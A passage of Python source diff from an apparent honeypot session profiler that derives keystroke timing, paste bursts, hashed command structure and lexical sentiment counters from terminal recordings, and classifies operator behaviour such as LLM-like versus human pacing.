    # Step G.0 derivations — lexical counters from the same single-pass
    # typed-text walk. No raw text retained; only fixed-vocabulary
    # membership counts and run-lengths. Drives valence (G.5), arousal
    # (G.6), and frustration_venting (G.8).
    obscenity_hits: int = 0
    positive_lex_hits: int = 0
    negative_lex_hits: int = 0
    caps_run_max: int = 0
    bang_run_max: int = 0
|
||||
|
||||
|
||||
def _detect_paste_bursts(
    inputs: list[AsciinemaEvent],
) -> tuple[tuple[PasteBurst, ...], int]:
    """Collapse runs of paste-class input events into ``PasteBurst`` records.

    An input event is paste-class when its payload holds at least
    ``PASTE_MIN_CHARS_PER_EVENT`` characters. Consecutive paste-class
    events stay in one burst while the gap to the previous input event
    does not exceed ``PASTE_BURST_MAX_IAT_S``; a larger gap, or any
    non-paste event, ends the burst.

    Returns ``(bursts, paste_event_count)`` where the count is the
    number of individual paste-class events, not the number of bursts.
    """
    finished: list[PasteBurst] = []
    total_paste_events = 0
    # (timestamp, payload length) of every event in the burst being built.
    open_run: list[tuple[float, int]] = []
    prev_ts: float | None = None

    def _flush() -> None:
        # Emit the open burst, if any, and start over with an empty one.
        if open_run:
            finished.append(PasteBurst(
                start_ts=open_run[0][0],
                end_ts=open_run[-1][0],
                char_count=sum(size for _ts, size in open_run),
                event_count=len(open_run),
            ))
            open_run.clear()

    for ts, _kind, payload in inputs:
        size = len(payload)
        if size >= PASTE_MIN_CHARS_PER_EVENT:
            total_paste_events += 1
            gap_too_long = (
                prev_ts is not None and (ts - prev_ts) > PASTE_BURST_MAX_IAT_S
            )
            if open_run and gap_too_long:
                _flush()
            open_run.append((ts, size))
        else:
            _flush()
        prev_ts = ts

    _flush()
    return tuple(finished), total_paste_events
|
||||
|
||||
|
||||
_BACKSPACE_CHARS = ("\x7f", "\x08")
|
||||
_KILL_LINE_CHARS = ("\x15", "\x17")
|
||||
|
||||
|
||||
def _scan_correction_signals(
|
||||
inputs: list[AsciinemaEvent],
|
||||
) -> tuple[int, tuple[float, ...], int]:
|
||||
"""Walk input events char-by-char, count backspaces / kill-lines /
|
||||
timing IATs.
|
||||
|
||||
PII discipline: only counts and IATs leave this function — no
|
||||
character data is retained or returned.
|
||||
"""
|
||||
backspace_count = 0
|
||||
kill_line_count = 0
|
||||
iats: list[float] = []
|
||||
last_non_bs_t: float | None = None
|
||||
for t, _kind, data in inputs:
|
||||
for c in data:
|
||||
if c in _BACKSPACE_CHARS:
|
||||
backspace_count += 1
|
||||
if last_non_bs_t is not None:
|
||||
iats.append(max(0.0, t - last_non_bs_t))
|
||||
elif c in _KILL_LINE_CHARS:
|
||||
kill_line_count += 1
|
||||
last_non_bs_t = t
|
||||
else:
|
||||
last_non_bs_t = t
|
||||
return backspace_count, tuple(iats), kill_line_count
|
||||
|
||||
|
||||
def _split_typing_bursts(iats: tuple[float, ...]) -> tuple[tuple[float, ...], ...]:
    """Cut a flat IAT sequence into typing bursts at think-pauses.

    Any IAT greater than ``IKI_THINK_MAX_S`` is a think-pause: it ends
    the current burst and is itself discarded. Bursts holding fewer
    than 3 IATs are dropped — too short to compute a stable CV.
    Mirrors BEHAVE prototype's ``_split_into_bursts``.
    """
    kept: list[tuple[float, ...]] = []
    current: list[float] = []
    for gap in iats:
        if gap > IKI_THINK_MAX_S:
            if len(current) >= 3:
                kept.append(tuple(current))
            current = []
            continue
        current.append(gap)
    if len(current) >= 3:
        kept.append(tuple(current))
    return tuple(kept)
|
||||
|
||||
|
||||
def _segment_commands(inputs: list[AsciinemaEvent]) -> tuple[Command, ...]:
    """Split the input character stream into commands at ``\\r`` / ``\\n``.

    For each command only the sha256 hash of its first
    whitespace-delimited token is kept, together with the three integer
    counters the Phase C ``motor.shell_mastery.*`` primitives need:

    * ``tab_count`` — ``\\t`` (0x09) keystrokes in the command
    * ``shortcut_count`` — readline control bytes from
      :data:`SHORTCUT_CTRL_BYTES`
    * ``pipe_count`` — ``|`` characters in the command (counted on
      every byte; pasted pipelines still indicate pipeline fluency the
      operator chose to execute)

    ``start_ts`` is the timestamp of the event that supplied the first
    buffered character and ``end_ts`` that of the terminator. A
    terminator that arrives with nothing buffered produces no command,
    and neither does trailing input that is never terminated. The
    buffer is discarded at every command boundary.
    """
    segmented: list[Command] = []
    pending: list[str] = []
    opened_at: float | None = None
    tabs = shortcuts = pipes = 0

    for ts, _kind, payload in inputs:
        for ch in payload:
            if ch not in ("\r", "\n"):
                if not pending:
                    opened_at = ts
                pending.append(ch)
                if ch == "\t":
                    tabs += 1
                elif ch == "|":
                    pipes += 1
                elif ch in SHORTCUT_CTRL_BYTES:
                    shortcuts += 1
                continue

            # Terminator: close the pending command, if there is one.
            if not pending:
                continue
            tokens = "".join(pending).strip().split(maxsplit=1)
            head = tokens[0] if tokens else ""
            segmented.append(Command(
                start_ts=opened_at if opened_at is not None else ts,
                end_ts=ts,
                first_token_hash=hash_token(head),
                tab_count=tabs,
                shortcut_count=shortcuts,
                pipe_count=pipes,
            ))
            pending = []
            opened_at = None
            tabs = shortcuts = pipes = 0

    return tuple(segmented)
|
||||
|
||||
|
||||
def _annotate_commands_with_output(
    commands: tuple[Command, ...],
    outputs: list[AsciinemaEvent],
) -> tuple[tuple[Command, ...], tuple[PromptLine, ...]]:
    """Rebuild ``commands`` with their output-derived fields populated.

    Each command owns the output window running from its own
    ``end_ts`` (the ``\\r``/``\\n`` that ran it) up to the ``start_ts``
    of the next command; the final command's window is unbounded
    (``math.inf``) so output arriving at or after ``t_end`` still
    counts. From that window every rebuilt ``Command`` receives
    ``errored``, ``output_bytes`` and ``followed_by_prompt`` (Step F.0).

    Returns ``(commands, prompt_lines)``; ``prompt_lines`` is the
    concatenation, in command order, of every ``PromptLine`` found in
    any window, for the caller to store on
    ``SessionContext.prompt_lines``.
    """
    if not commands:
        return commands, ()

    window_ends = [nxt.start_ts for nxt in commands[1:]]
    window_ends.append(math.inf)

    enriched: list[Command] = []
    prompts_seen: list[PromptLine] = []
    for cmd, window_end in zip(commands, window_ends):
        n_bytes, saw_error, found = _output_window(outputs, cmd.end_ts, window_end)
        prompts_seen.extend(found)
        enriched.append(Command(
            start_ts=cmd.start_ts,
            end_ts=cmd.end_ts,
            first_token_hash=cmd.first_token_hash,
            tab_count=cmd.tab_count,
            shortcut_count=cmd.shortcut_count,
            pipe_count=cmd.pipe_count,
            errored=saw_error,
            output_bytes=n_bytes,
            followed_by_prompt=bool(found),
        ))
    return tuple(enriched), tuple(prompts_seen)
|
||||
|
||||
|
||||
def _per_command_iats(
|
||||
commands: tuple[Command, ...],
|
||||
inputs: list[AsciinemaEvent],
|
||||
) -> tuple[tuple[float, ...], ...]:
|
||||
"""Per-command IATs between consecutive input events whose
|
||||
timestamps fall in ``[cmd.start_ts, cmd.end_ts)``.
|
||||
|
||||
Excludes the terminator IAT (the last event at ``cmd.end_ts`` is
|
||||
the ``\\r``/``\\n`` itself). Returns one tuple per command.
|
||||
"""
|
||||
out: list[tuple[float, ...]] = []
|
||||
for cmd in commands:
|
||||
prev_t: float | None = None
|
||||
cmd_iats: list[float] = []
|
||||
for t, _kind, _data in inputs:
|
||||
if t < cmd.start_ts or t >= cmd.end_ts:
|
||||
continue
|
||||
if prev_t is not None:
|
||||
cmd_iats.append(max(0.0, t - prev_t))
|
||||
prev_t = t
|
||||
out.append(tuple(cmd_iats))
|
||||
return tuple(out)
|
||||
|
||||
|
||||
def _output_bytes_between(
|
||||
outputs: list[AsciinemaEvent],
|
||||
start: float,
|
||||
end: float,
|
||||
) -> int:
|
||||
"""Total ``len(d)`` of output events with ``start <= t < end``."""
|
||||
return sum(len(d) for t, _k, d in outputs if start <= t < end)
|
||||
|
||||
|
||||
def _typed_char_histograms(
    inputs: list[AsciinemaEvent],
) -> tuple[Mapping[str, int], Mapping[str, int], int, _LexCounters]:
    """Walk input events, build typed-only unigram + bigram histograms
    plus the Phase G lexical counters.

    Skip paste-class events (``len(data) >= PASTE_MIN_CHARS_PER_EVENT``)
    — pasted text reveals nothing about the operator's keyboard or
    sentiment. Letter bigrams chain only across consecutive ASCII-letter
    chars; a digit or punctuation character breaks the chain.

    Lexical counters (G.0): a small word buffer (≤ ``LEXEME_MAX_LEN``)
    accumulates ASCII-letter chars (case-folded). On any non-letter
    boundary, every suffix of the buffer is checked against
    ``POSITIVE_LEXEMES`` / ``NEGATIVE_LEXEMES`` / ``OBSCENITY_LEXEMES``;
    the longest match wins (so ``fucking`` counts as one obscenity hit,
    not two — ``fuck`` + ``fucking``). Caps and bang runs are tracked
    in the same walk.

    A word contributes at most one hit in total. When one suffix is in
    more than one lexicon, the obscenity set is tested first, then the
    positive set, then the negative set.

    The bigram histogram is truncated to the ``LAYOUT_BIGRAM_TOP_N``
    most frequent entries before it is returned; the unigram histogram
    is returned whole.

    Returns ``(unigrams, bigrams, total_letters, lex_counters)``.
    """
    unigrams: dict[str, int] = {}
    bigrams: dict[str, int] = {}
    total_letters = 0
    # Previous ASCII letter (lower-cased), or None when the chain is broken.
    last_letter: str | None = None

    # Lower-cased letters of the word currently being typed. Only ever
    # mutated in place, so the ``_flush_word`` closure always sees it.
    word_buf: list[str] = []
    obscenity_hits = 0
    positive_lex_hits = 0
    negative_lex_hits = 0
    caps_run_cur = 0
    caps_run_max = 0
    bang_run_cur = 0
    bang_run_max = 0

    def _flush_word() -> tuple[int, int, int]:
        """Match longest lexeme suffix in ``word_buf``; return per-set deltas."""
        if not word_buf:
            return 0, 0, 0
        s = "".join(word_buf)
        # Longest-suffix scan against fixed lexicons.
        for length in range(min(len(s), LEXEME_MAX_LEN), 0, -1):
            suffix = s[-length:]
            if suffix in OBSCENITY_LEXEMES:
                return 1, 0, 0
            if suffix in POSITIVE_LEXEMES:
                return 0, 1, 0
            if suffix in NEGATIVE_LEXEMES:
                return 0, 0, 1
        return 0, 0, 0

    for _t, _kind, data in inputs:
        if len(data) >= PASTE_MIN_CHARS_PER_EVENT:
            # Paste boundary breaks every running counter.
            last_letter = None
            obs_d, pos_d, neg_d = _flush_word()
            obscenity_hits += obs_d
            positive_lex_hits += pos_d
            negative_lex_hits += neg_d
            word_buf.clear()
            caps_run_cur = 0
            bang_run_cur = 0
            continue
        for c in data:
            # Caps-run tracking
            if c.isascii() and c.isupper():
                caps_run_cur += 1
                if caps_run_cur > caps_run_max:
                    caps_run_max = caps_run_cur
            else:
                caps_run_cur = 0
            # Bang-run tracking
            if c == "!":
                bang_run_cur += 1
                if bang_run_cur > bang_run_max:
                    bang_run_max = bang_run_cur
            else:
                bang_run_cur = 0
            # Histogram + lexeme buffering
            if c.isascii() and c.isalpha():
                lower = c.lower()
                unigrams[lower] = unigrams.get(lower, 0) + 1
                total_letters += 1
                if last_letter is not None:
                    big = last_letter + lower
                    bigrams[big] = bigrams.get(big, 0) + 1
                last_letter = lower
                word_buf.append(lower)
                if len(word_buf) > LEXEME_MAX_LEN:
                    # Slide window — only the tail can match a lexeme.
                    word_buf[:] = word_buf[-LEXEME_MAX_LEN:]
            else:
                # Any non-letter ends both the bigram chain and the word.
                last_letter = None
                obs_d, pos_d, neg_d = _flush_word()
                obscenity_hits += obs_d
                positive_lex_hits += pos_d
                negative_lex_hits += neg_d
                word_buf.clear()

    # Trailing word (no boundary at end of input).
    obs_d, pos_d, neg_d = _flush_word()
    obscenity_hits += obs_d
    positive_lex_hits += pos_d
    negative_lex_hits += neg_d

    if len(bigrams) > LAYOUT_BIGRAM_TOP_N:
        # The sort is stable, so equally frequent bigrams keep
        # first-seen order when the cut falls between them.
        top = sorted(bigrams.items(), key=lambda kv: -kv[1])[:LAYOUT_BIGRAM_TOP_N]
        bigrams = dict(top)
    return unigrams, bigrams, total_letters, _LexCounters(
        obscenity_hits=obscenity_hits,
        positive_lex_hits=positive_lex_hits,
        negative_lex_hits=negative_lex_hits,
        caps_run_max=caps_run_max,
        bang_run_max=bang_run_max,
    )
|
||||
|
||||
|
||||
def _output_window(
    outputs: list[AsciinemaEvent],
    start: float,
    end: float,
) -> tuple[int, bool, tuple[PromptLine, ...]]:
    """Summarise the output events whose timestamp lies in ``[start, end)``.

    Returns ``(byte_count, errored, prompt_lines)``:

    * ``byte_count`` — summed ``len()`` of the raw payloads, measured
      before ANSI stripping;
    * ``errored`` — result of ``detect_error_in_output`` on the
      ANSI-stripped concatenation of those payloads;
    * ``prompt_lines`` — PS1 lines that ``extract_prompt_lines`` finds
      in the same stripped text (Step F.0), stamped with the timestamp
      of the last event in the window.

    An empty window yields ``(0, False, ())`` without calling any of
    the helpers.

    PII trade-off (Phase F): the stripped text is discarded on return,
    but ``prompt_lines`` retains PS1 strings (capped at
    ``PROMPT_LINE_MAX_CHARS``). Only derived values leave the engine
    via observations; the prompt strings live on ``SessionContext`` so
    F.1 / F.3 / E.4 can read them.
    """
    in_window = [
        (ts, payload) for ts, _kind, payload in outputs if start <= ts < end
    ]
    if not in_window:
        return 0, False, ()

    raw_size = sum(len(payload) for _ts, payload in in_window)
    final_ts = in_window[-1][0]
    clean = strip_ansi("".join(payload for _ts, payload in in_window))
    saw_error = detect_error_in_output(clean)
    found = tuple(extract_prompt_lines(
        clean, base_ts=final_ts, max_chars=PROMPT_LINE_MAX_CHARS,
    ))
    return raw_size, saw_error, found
|
||||
|
||||
|
||||
def build_session_context(
    events: Iterable[AsciinemaEvent],
    *,
    sid: str,
    source: str,
    evidence_ref: str | None = None,
) -> SessionContext:
    """Build the :class:`SessionContext` for one session's ``events``.

    ``events`` is consumed exactly once (a generator is fine) and split
    into input (``"i"``) and output (``"o"``) events; events of any
    other kind only contribute to the session time bounds. Every
    derived field is then computed from those two in-memory lists, so
    feature functions never need to touch the raw stream again.

    Parameters:
        events: ``(timestamp, kind, data)`` triples, assumed to be in
            chronological order.
        sid: session identifier stored on the context.
        source: source label stored on the context.
        evidence_ref: evidence pointer; when omitted or empty it
            defaults to ``"session:<sid>"``.

    Returns:
        The fully populated, frozen ``SessionContext``. ``t_start`` is
        the first event's timestamp and ``t_end`` the largest timestamp
        seen; both are ``0.0`` for an empty stream.
    """
    inputs: list[AsciinemaEvent] = []
    outputs: list[AsciinemaEvent] = []
    t_first: float | None = None
    t_last: float = 0.0

    for ev in events:
        t, kind, _ = ev
        if t_first is None:
            t_first = t
        if t > t_last:
            t_last = t
        if kind == "i":
            inputs.append(ev)
        elif kind == "o":
            outputs.append(ev)

    # With no events ``t_last`` is still its 0.0 initial value, so only
    # ``t_start`` needs an explicit fallback.
    t_start = 0.0 if t_first is None else t_first
    t_end = t_last

    iats: tuple[float, ...] = tuple(
        max(0.0, cur[0] - prev[0]) for prev, cur in zip(inputs, inputs[1:])
    )
    paste_bursts, paste_count = _detect_paste_bursts(inputs)
    typing_bursts = _split_typing_bursts(iats)
    backspace_count, backspace_iats, kill_line_count = _scan_correction_signals(inputs)
    commands = _segment_commands(inputs)
    commands, prompt_lines = _annotate_commands_with_output(commands, outputs)
    inter_cmd_iats = tuple(
        max(0.0, nxt.start_ts - cmd.end_ts)
        for cmd, nxt in zip(commands, commands[1:])
    )
    # The annotation pass above already measured, for every command but
    # the last, the output emitted in ``[end_ts, next.start_ts)`` and
    # stored it as ``output_bytes``. Reusing it avoids re-scanning the
    # whole output list once per command for the same number.
    output_per_cmd = tuple(cmd.output_bytes for cmd in commands[:-1])
    intra_command_iats = _per_command_iats(commands, inputs)
    typed_uni, typed_bi, typed_letters, lex = _typed_char_histograms(inputs)

    return SessionContext(
        sid=sid,
        source=source,
        evidence_ref=evidence_ref or f"session:{sid}",
        t_start=t_start,
        t_end=t_end,
        duration_s=max(0.0, t_end - t_start),
        input_events=tuple(inputs),
        output_events=tuple(outputs),
        iats=iats,
        paste_bursts=paste_bursts,
        paste_event_count=paste_count,
        commands=commands,
        inter_cmd_iats=inter_cmd_iats,
        output_per_cmd=output_per_cmd,
        typing_bursts=typing_bursts,
        backspace_count=backspace_count,
        backspace_iats=backspace_iats,
        kill_line_count=kill_line_count,
        intra_command_iats=intra_command_iats,
        prompt_lines=prompt_lines,
        typed_unigram_counts=typed_uni,
        typed_bigram_counts=typed_bi,
        typed_letter_count=typed_letters,
        obscenity_hits=lex.obscenity_hits,
        positive_lex_hits=lex.positive_lex_hits,
        negative_lex_hits=lex.negative_lex_hits,
        caps_run_max=lex.caps_run_max,
        bang_run_max=lex.bang_run_max,
    )
|
||||
@@ -1,104 +0,0 @@
|
||||
"""Registered feature functions.
|
||||
|
||||
Each entry takes a ``SessionContext`` and yields zero or more
|
||||
``Observation`` instances. Adding a primitive = adding a function in a
|
||||
sibling module and appending it to ``FEATURES``.
|
||||
"""
|
||||
from __future__ import annotations
|
||||
|
||||
from typing import Callable, Iterable
|
||||
|
||||
from behave_core.spec.envelope import Observation
|
||||
|
||||
from decnet.profiler.behave_shell._ctx import SessionContext
|
||||
from decnet.profiler.behave_shell._features.cognitive import (
|
||||
cognitive_load,
|
||||
command_branch_diversity,
|
||||
error_resilience_fallback_to_man,
|
||||
error_resilience_frustration_typing,
|
||||
error_resilience_retry_tactic,
|
||||
exploration_style,
|
||||
feedback_loop_engagement,
|
||||
planning_depth,
|
||||
tool_vocabulary,
|
||||
inter_command_consistency,
|
||||
inter_command_latency_class,
|
||||
)
|
||||
from decnet.profiler.behave_shell._features.emotional_valence import (
|
||||
arousal,
|
||||
frustration_venting,
|
||||
stress_response,
|
||||
valence,
|
||||
)
|
||||
from decnet.profiler.behave_shell._features.environmental import (
|
||||
keyboard_layout,
|
||||
locale,
|
||||
numpad_usage,
|
||||
shell_type,
|
||||
terminal_multiplexer,
|
||||
)
|
||||
from decnet.profiler.behave_shell._features.operational import (
|
||||
cleanup_behavior,
|
||||
multi_actor_indicators,
|
||||
objective,
|
||||
opsec_discipline,
|
||||
)
|
||||
from decnet.profiler.behave_shell._features.temporal import (
|
||||
escalation_pattern,
|
||||
exit_behavior,
|
||||
landing_ritual,
|
||||
session_duration,
|
||||
)
|
||||
from decnet.profiler.behave_shell._features.motor import (
|
||||
command_chunking,
|
||||
error_correction,
|
||||
input_modality,
|
||||
keystroke_cadence,
|
||||
motor_stability,
|
||||
paste_burst_rate,
|
||||
pipe_chaining_depth,
|
||||
shortcut_usage,
|
||||
tab_completion,
|
||||
)
|
||||
|
||||
# Signature shared by every registered feature function: it reads one
# SessionContext and yields zero or more Observations.
FeatureFn = Callable[[SessionContext], Iterable[Observation]]

# Registry of feature functions, grouped by the sibling module each one
# is imported from. Append new primitives here.
# NOTE(review): presumably the engine runs these in tuple order —
# confirm in the extractor before reordering.
FEATURES: tuple[FeatureFn, ...] = (
    # motor
    input_modality,
    paste_burst_rate,
    keystroke_cadence,
    motor_stability,
    error_correction,
    command_chunking,
    tab_completion,
    shortcut_usage,
    pipe_chaining_depth,
    # cognitive
    inter_command_latency_class,
    command_branch_diversity,
    feedback_loop_engagement,
    inter_command_consistency,
    cognitive_load,
    exploration_style,
    planning_depth,
    tool_vocabulary,
    error_resilience_retry_tactic,
    error_resilience_frustration_typing,
    error_resilience_fallback_to_man,
    # temporal
    session_duration,
    escalation_pattern,
    landing_ritual,
    exit_behavior,
    # environmental
    shell_type,
    terminal_multiplexer,
    locale,
    keyboard_layout,
    numpad_usage,
    # operational
    objective,
    opsec_discipline,
    cleanup_behavior,
    multi_actor_indicators,
    # emotional_valence
    valence,
    arousal,
    stress_response,
    frustration_venting,
)
|
||||
@@ -1,32 +0,0 @@
|
||||
"""Helper for building registry-valid :class:`Observation` records.
|
||||
|
||||
Every feature module would otherwise repeat the same Window /
|
||||
source / evidence_ref boilerplate. This helper centralises it and is
|
||||
the one place to reach when emission semantics change (e.g. when we
|
||||
start parametrising windows on a per-primitive basis).
|
||||
"""
|
||||
from __future__ import annotations
|
||||
|
||||
from typing import Any
|
||||
|
||||
from behave_core.spec.envelope import Observation, Window
|
||||
|
||||
from decnet.profiler.behave_shell._ctx import SessionContext
|
||||
|
||||
|
||||
def make_observation(
    ctx: SessionContext,
    *,
    primitive: str,
    value: Any,
    confidence: float,
) -> Observation:
    """Wrap one primitive's result in an :class:`Observation`.

    The observation window always spans the whole session
    (``ctx.t_start`` to ``ctx.t_end``); ``source`` and ``evidence_ref``
    are copied from ``ctx`` so feature functions only supply the
    primitive name, its value and a confidence.
    """
    whole_session = Window(start_ts=ctx.t_start, end_ts=ctx.t_end)
    return Observation(
        primitive=primitive,
        value=value,
        confidence=confidence,
        window=whole_session,
        source=ctx.source,
        evidence_ref=ctx.evidence_ref,
    )
|
||||
@@ -1,593 +0,0 @@
|
||||
"""``cognitive.*`` feature functions.
|
||||
|
||||
Step 5: ``cognitive.inter_command_latency_class``.
|
||||
Step 6: ``cognitive.command_branch_diversity``.
|
||||
Step 7: ``cognitive.feedback_loop_engagement``.
|
||||
Step 8: ``cognitive.inter_command_consistency``.
|
||||
Step D.1: ``cognitive.cognitive_load``.
|
||||
"""
|
||||
from __future__ import annotations
|
||||
|
||||
import statistics
|
||||
from typing import Iterator
|
||||
|
||||
from behave_core.spec.envelope import Observation
|
||||
|
||||
from decnet.profiler.behave_shell._ctx import SessionContext
|
||||
from decnet.profiler.behave_shell._features._emit import make_observation
|
||||
from decnet.profiler.behave_shell._parse import hash_token
|
||||
from decnet.profiler.behave_shell._thresholds import (
|
||||
BRANCH_DIVERSITY_LINEAR_MIN,
|
||||
COGNITIVE_LOAD_CHUNKING_REF_CV,
|
||||
COGNITIVE_LOAD_LOW_MAX,
|
||||
COGNITIVE_LOAD_MEDIUM_MAX,
|
||||
COGNITIVE_LOAD_PACE_REF_CV,
|
||||
EXPLORATION_CHAOTIC_BACKTRACK_MIN,
|
||||
EXPLORATION_TARGETED_REP_MIN,
|
||||
FEEDBACK_CORRELATION_MIN,
|
||||
FEEDBACK_MIN_PAIRS,
|
||||
FRUSTRATION_LOW_MAX,
|
||||
FRUSTRATION_MODERATE_MAX,
|
||||
IKI_THINK_MAX_S,
|
||||
INTER_CMD_DELIBERATE_MAX,
|
||||
INTER_CMD_INSTANT_MAX,
|
||||
INTER_CMD_LLM_HEAVYWEIGHT_MAX,
|
||||
INTER_CMD_LLM_LIGHTWEIGHT_MAX,
|
||||
INTER_CMD_TYPING_MAX,
|
||||
MIN_COMMANDS_FOR_FULL_CONFIDENCE,
|
||||
PAUSE_CV_BIMODAL_MIN,
|
||||
PAUSE_CV_METRONOMIC_MAX,
|
||||
PLANNING_DEEP_MIN,
|
||||
PLANNING_REACTIVE_MIN,
|
||||
TOOL_VOCAB_BROAD_MIN,
|
||||
TOOL_VOCAB_NARROW_MAX,
|
||||
)
|
||||
|
||||
|
||||
# Hashes of the help-family first tokens, computed once at import so
# the per-command check is a set lookup rather than fresh sha256 work.
# The ``--help`` / ``-h`` flag forms cannot be covered: they are never
# first tokens, and PII discipline keeps only the *first* token's
# hash. v0.2 will reconsider once corpus calibration justifies storing
# arg-token hashes too.
_HELP_FAMILY_HASHES: frozenset[str] = frozenset(
    hash_token(word) for word in ("man", "help", "info")
)
|
||||
|
||||
|
||||
def _clip01(x: float) -> float:
|
||||
if x < 0.0:
|
||||
return 0.0
|
||||
if x > 1.0:
|
||||
return 1.0
|
||||
return x
|
||||
|
||||
|
||||
def _cv(xs: tuple[float, ...] | list[float]) -> float | None:
|
||||
"""Coefficient of variation; ``None`` if undefined (n<2 or mean==0)."""
|
||||
if len(xs) < 2:
|
||||
return None
|
||||
mean = statistics.fmean(xs)
|
||||
if mean <= 0.0:
|
||||
return None
|
||||
return statistics.stdev(xs) / mean
|
||||
|
||||
|
||||
def _bucket_inter_cmd_latency(median_iat: float) -> str:
    """Map a median inter-command gap onto its latency-class label.

    The thresholds are inclusive upper bounds, tried in ascending
    order; a value above all of them is ``"long"``.
    """
    ladder = (
        (INTER_CMD_INSTANT_MAX, "instant"),
        (INTER_CMD_TYPING_MAX, "typing_speed"),
        (INTER_CMD_DELIBERATE_MAX, "deliberate"),
        (INTER_CMD_LLM_LIGHTWEIGHT_MAX, "llm_lightweight"),
        (INTER_CMD_LLM_HEAVYWEIGHT_MAX, "llm_heavyweight"),
    )
    for ceiling, label in ladder:
        if median_iat <= ceiling:
            return label
    return "long"
|
||||
|
||||
|
||||
def inter_command_latency_class(ctx: SessionContext) -> Iterator[Observation]:
    """Emit ``cognitive.inter_command_latency_class``.

    The operator's *thinking pace* between commands: the median of
    ``ctx.inter_cmd_iats`` bucketed against the calibrated thresholds.
    Splits LW-sim / CLAUDE-FF / CLAUDE-CL.

    Nothing is emitted when there are no inter-command gaps.
    Confidence is 0.80, or 0.40 when the session has fewer than
    ``MIN_COMMANDS_FOR_FULL_CONFIDENCE`` commands.
    """
    gaps = ctx.inter_cmd_iats
    if gaps:
        # Sample-size honesty: a short session only earns half confidence.
        enough_commands = len(ctx.commands) >= MIN_COMMANDS_FOR_FULL_CONFIDENCE
        yield make_observation(
            ctx,
            primitive="cognitive.inter_command_latency_class",
            value=_bucket_inter_cmd_latency(statistics.median(gaps)),
            confidence=0.80 if enough_commands else 0.40,
        )
|
||||
|
||||
|
||||
def command_branch_diversity(ctx: SessionContext) -> Iterator[Observation]:
    """Emit ``cognitive.command_branch_diversity``.

    A content-based discriminator with no timing input: the ratio of
    distinct first-token hashes to total commands. A ratio at or above
    ``BRANCH_DIVERSITY_LINEAR_MIN`` is ``linear_playbook`` (CLAUDE-FF);
    anything lower is ``adaptive_branching`` (CLAUDE-CL) — the operator
    is reusing tools, which is the signal of interest. Empirical anchor
    from 2026-05-02: fire-and-forget runs ~10 distinct tools;
    closed-loop runs 5-6 with ``curl`` re-invoked as the operator
    chases threads.

    With no commands nothing is emitted. With fewer than
    ``MIN_COMMANDS_FOR_FULL_CONFIDENCE`` commands the value is
    ``unknown`` at confidence 1.0: lacking *enough* data is itself a
    high-confidence answer.
    """
    total = len(ctx.commands)
    if total == 0:
        # Nothing honest to say about an empty session.
        return

    if total < MIN_COMMANDS_FOR_FULL_CONFIDENCE:
        verdict, certainty = "unknown", 1.0
    else:
        distinct = {cmd.first_token_hash for cmd in ctx.commands}
        is_linear = len(distinct) / total >= BRANCH_DIVERSITY_LINEAR_MIN
        verdict = "linear_playbook" if is_linear else "adaptive_branching"
        certainty = 0.80

    yield make_observation(
        ctx,
        primitive="cognitive.command_branch_diversity",
        value=verdict,
        confidence=certainty,
    )
|
||||
|
||||
|
||||
def feedback_loop_engagement(ctx: SessionContext) -> Iterator[Observation]:
    """Emit ``cognitive.feedback_loop_engagement``.

    Correlates ``output_per_cmd[i]`` (how much output the operator saw
    before the next command) with ``inter_cmd_iats[i]`` (the pause that
    followed), using ``statistics.correlation``. A coefficient above
    ``FEEDBACK_CORRELATION_MIN`` is ``closed_loop`` — more to read,
    longer pause; otherwise ``fire_and_forget`` — pacing independent of
    output. This CUTS ACROSS the LLM/human axis: closed-loop LLMs and
    reading humans both score ``closed_loop``.

    ``unknown`` at confidence 1.0 is emitted when no honest correlation
    exists: the session has no output events, there are fewer than
    ``FEEDBACK_MIN_PAIRS`` pairs, or ``statistics.correlation`` rejects
    the data (e.g. a constant series). A session with no commands emits
    nothing.
    """
    pairs = list(zip(ctx.output_per_cmd, ctx.inter_cmd_iats))
    starved = not ctx.output_events or len(pairs) < FEEDBACK_MIN_PAIRS
    if starved and not ctx.commands:
        return

    verdict, certainty = "unknown", 1.0
    if not starved:
        seen = [float(pair[0]) for pair in pairs]
        waited = [float(pair[1]) for pair in pairs]
        try:
            r = statistics.correlation(seen, waited)
        except statistics.StatisticsError:
            # Correlation undefined — keep the "unknown" verdict.
            verdict, certainty = "unknown", 1.0
        else:
            verdict = "closed_loop" if r > FEEDBACK_CORRELATION_MIN else "fire_and_forget"
            certainty = 0.75

    yield make_observation(
        ctx,
        primitive="cognitive.feedback_loop_engagement",
        value=verdict,
        confidence=certainty,
    )
|
||||
|
||||
|
||||
def error_resilience_fallback_to_man(ctx: SessionContext) -> Iterator[Observation]:
    """Emit ``cognitive.error_resilience.fallback_to_man``.

    Looks at the command immediately following each errored command. If
    that follow-up's ``first_token_hash`` is in ``_HELP_FAMILY_HASHES``
    (the ``man`` / ``help`` / ``info`` family) for at least one error,
    the verdict is ``present``; otherwise ``absent``. An errored command
    with no successor contributes nothing.

    No observation is produced when no command errored: the registry's
    binary has no ``unknown``, and ``absent`` without any evidence would
    be dishonest.

    Confidence is 0.40 while the number of errored commands is below
    ``MIN_COMMANDS_FOR_FULL_CONFIDENCE``, 0.65 otherwise.

    ``--help`` / ``-h`` flag forms cannot trigger this primitive in
    v0.1 — they are not first tokens and only ``first_token_hash`` is
    retained per command (PII discipline). Filed for v0.2.
    """
    cmds = ctx.commands
    error_positions = [pos for pos, cmd in enumerate(cmds) if cmd.errored]
    if not error_positions:
        return

    last_pos = len(cmds) - 1
    help_followups = sum(
        1
        for pos in error_positions
        if pos < last_pos
        and cmds[pos + 1].first_token_hash in _HELP_FAMILY_HASHES
    )
    verdict = "present" if help_followups > 0 else "absent"

    well_sampled = len(error_positions) >= MIN_COMMANDS_FOR_FULL_CONFIDENCE
    yield make_observation(
        ctx,
        primitive="cognitive.error_resilience.fallback_to_man",
        value=verdict,
        confidence=0.65 if well_sampled else 0.40,
    )
|
||||
|
||||
|
||||
def error_resilience_frustration_typing(ctx: SessionContext) -> Iterator[Observation]:
    """Emit ``cognitive.error_resilience.frustration_typing``.

    For every command after the first, the median of its within-command
    IATs is filed under "followed an error" or "followed a success"
    depending on the previous command's ``errored`` flag. The verdict is
    the relative gap between the two group medians::

        delta = |median_err - median_ok| / median_ok

    * delta < ``FRUSTRATION_LOW_MAX`` → ``low``
    * delta < ``FRUSTRATION_MODERATE_MAX`` → ``moderate``
    * otherwise → ``high``

    The delta is absolute: a speed-up (rage / fluency) and a slowdown
    (caution) both count as arousal.

    Nothing is emitted when there are fewer than two commands, when
    ``ctx.intra_command_iats`` is not aligned one-to-one with
